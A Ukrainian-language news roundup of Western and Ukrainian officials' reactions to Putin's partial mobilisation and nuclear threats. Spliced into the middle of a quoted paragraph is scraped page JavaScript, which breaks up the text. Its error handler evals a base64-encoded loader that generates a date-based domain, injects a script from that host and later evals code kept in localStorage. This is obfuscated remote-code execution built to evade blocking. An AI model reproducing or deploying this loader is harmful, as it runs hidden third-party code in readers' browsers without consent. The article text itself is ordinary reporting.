Як відреагувала світова спільнота на погрози Путіна ядерною зброєю: огляд думок

У своєму нещодавному зверненні президент РФ Володимир Путін зробив декілька заяв зодо мобілізації та використання ядерної зброї. Це, у свою чергу, змусило відреагувати світових лідерів.

Володимир Путін робить «дуже небезпечну ядерну авантюру» і повинен «припинити таку безрозсудну поведінку», попередив виконавчий директор ЄС.

Речник Єврокомісії Петер Стано додав, що «фіктивні, незаконні референдуми», заплановані на ці вихідні в Луганську, Донецьку, Херсоні та Запоріжжі, не будуть визнані.

Стано сказав журналістам:

Путін робить ядерну авантюру. Він використовує ядерний елемент як частину свого арсеналу терору, це неприйнятно.

Країни-члени ЄС провели дискусії щодо того, як реагувати на останні події у війні Росії в Україні , продовжив він, попередивши Москву, що будуть «наслідки з нашого боку».

Прем’єр-міністр Естонії Кая Каллас, один із жорстких противників Володимира Путіна , закликала Захід не хитатися перед обличчям ядерного шантажу Путіна.

Це перший раз, коли кремлівське керівництво висловлюється після контрнаступу України. Їм потрібно показати, що вони проявляють ініціативу. Якщо Росія не може перемогти звичайним способом, вони погрожують ядерною зброєю і шукають способи продемонструвати політичну перемогу.

Промова президента Путіна мала налякати міжнародне співтовариство. Щодо ядерної загрози, то мета така ж, як і досі – це розпалювати страх і тероризувати широкі верстви населення. Кремль шантажує міжнародне співтовариство і хоче нас налякати та стримати від допомоги Україні. Європа не втомиться; ми продовжуватимемо захищати та підтримувати принципи європейської безпеки та міжнародного права. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Радник президента України Михайло Подоляк назвав рішення Путіна оголосити часткову мобілізацію «передбачуваним кроком», який підкреслює, що війна йде не за планом Кремля.

Промову Путіна також швидко засудили західні лідери. Віце-канцлер Німеччини Роберт Хабек назвав рішення Росії оголосити часткову мобілізацію «ще одним поганим і неправильним кроком Росії».

Британський міністр оборони Бен Уоллес заявив: «Порушення Путіним своїх власних обіцянок не мобілізувати частину населення та незаконна анексія частини України є визнанням того, що його вторгнення провалюється».

Міністр оборони Литви Арвідас Анушаускас заявив, що країна має привести свої сили швидкого реагування в стан підвищеної готовності, оскільки мобілізація також відбуватиметься на її кордоні з російським ексклавом Калінінградом.

Міністр закордонних справ Латвії Едгарс Рінкевич заявив, що країна не надаватиме притулок росіянам, які тікають від мобілізації Москвою військ.

Прем’єр-міністр Польщі Матеуш Моравецький підтвердив підтримку України з боку своєї країни . Reuters повідомляє, що він сказав ЗМІ:

Ми зробимо все можливе з нашими союзниками, щоб НАТО ще більше підтримувало Україну, щоб вона могла захистити себе. Повідомлення про часткову мобілізацію підтвердилися. Росія намагатиметься знищити Україну та захопити частину її території. Ми не можемо цього допустити.

Моравецький був присутній на військових навчаннях, які польська армія проводила разом із союзниками США та Великобританії у східній Польщі. (adsbygoogle = window.adsbygoogle || []).push({});

Путін заявив про часткову мобілізацію в рф Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-vidreaguvala-svitova-spilnota-na-pogrozi-putina-yadernoyu-zbroyeyu-oglyad-dumok/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top